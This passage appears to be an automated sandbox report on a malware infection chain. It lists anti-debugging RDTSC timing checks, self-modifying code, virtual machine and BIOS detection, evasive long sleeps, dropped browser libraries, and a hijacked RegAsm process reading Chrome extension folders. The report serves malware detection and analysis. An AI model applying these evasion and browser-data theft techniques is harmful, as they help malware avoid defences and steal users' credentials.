Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1129E37 second address: 1129E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F76E5186DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112CD5D second address: 112CD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112D0CC second address: 112D0DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F76E5186DE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112D0DF second address: 112D129 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5036BACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b movsx edx, si 0x0000000e push dword ptr [ebp+12451AB4h] 0x00000014 mov edx, dword ptr [ebp+122D2E57h] 0x0000001a push 90884E58h 0x0000001f pushad 0x00000020 ja 00007F76E5036BA8h 0x00000026 push edi 0x00000027 pop edi 0x00000028 pushad 0x00000029 jmp 00007F76E5036BB9h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112E22C second address: 112E248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F76E5186DE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76E5186DF0h 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112E248 second address: 112E263 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76E5036BA6h 0x00000008 jmp 00007F76E5036BB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112E263 second address: 112E2AD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76E5186DF4h 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F76E5186DEEh 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jnp 00007F76E5186E17h 0x00000019 pushad 0x0000001a jmp 00007F76E5186DF7h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112E2AD second address: 112E2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B0425 second address: 54B0429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B0429 second address: 54B042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B042F second address: 54B0446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 735CA34Fh 0x00000008 mov eax, 3A6A256Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B0446 second address: 54B045B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5036BB1h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B045B second address: 54B0493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov eax, 4AE5A2B3h 0x00000012 mov si, B70Fh 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F76E5186DF1h 0x00000020 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B04F7 second address: 54B053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e jmp 00007F76E5036BB9h 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F76E5036BACh 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B053A second address: 54B054C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5186DEEh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 54B054C second address: 54B0550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10547D8 second address: 10547DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Special instruction interceptor: First address: EA3B64 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Special instruction interceptor: First address: 1043620 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Special instruction interceptor: First address: 1050685 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 30A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 3220000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 5220000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 6040000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: 7040000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory allocated: 14B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory allocated: 30E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory allocated: 2F40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Memory allocated: 1780000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Memory allocated: 3230000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Memory allocated: 17A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory allocated: 2130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory allocated: 23C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory allocated: 2130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Memory allocated: 1360000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Memory allocated: 30E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Memory allocated: 2EC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory allocated: 17A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory allocated: 3290000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory allocated: 1810000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory allocated: 770000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory allocated: 2290000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory allocated: 4290000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: B10000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2770000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4770000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 1660000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 3170000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 30A0000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 1520000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 50D0000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 3740000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 39C0000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 3740000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Memory allocated: 1870000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Memory allocated: 31E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Memory allocated: 51E0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\FileApp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 1837
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 621
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\627000\Legitimate.pif Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\userEHJKFCGHID.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 5.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\FileApp.exe TID: 2536 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2360 Thread sleep count: 281 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2360 Thread sleep time: -56200s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe TID: 2876 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5884 Thread sleep count: 93 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5884 Thread sleep time: -186093s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 964 Thread sleep count: 105 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 964 Thread sleep time: -210105s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5264 Thread sleep count: 145 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5264 Thread sleep time: -290145s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 368 Thread sleep count: 128 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 368 Thread sleep time: -256128s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5368 Thread sleep count: 260 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5368 Thread sleep time: -1560000s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 2032 Thread sleep count: 101 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 2032 Thread sleep time: -202101s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 4876 Thread sleep count: 113 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 4876 Thread sleep time: -226113s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 6472 Thread sleep count: 96 > 30 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 6472 Thread sleep time: -192096s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe TID: 2220 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe TID: 1592 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe TID: 5128 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe TID: 2832 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5720 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3648 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5316 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4928 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1408 Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe TID: 6532 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe TID: 6788 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe TID: 4020 Thread sleep time: -922337203685477s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_004062EB FindFirstFileW,FindClose, 14_2_004062EB
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 14_2_00406CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 22_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 22_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 22_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 22_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 22_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 22_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00401160 GetSystemInfo,ExitProcess, 22_2_00401160
Source: C:\Users\user\Desktop\FileApp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
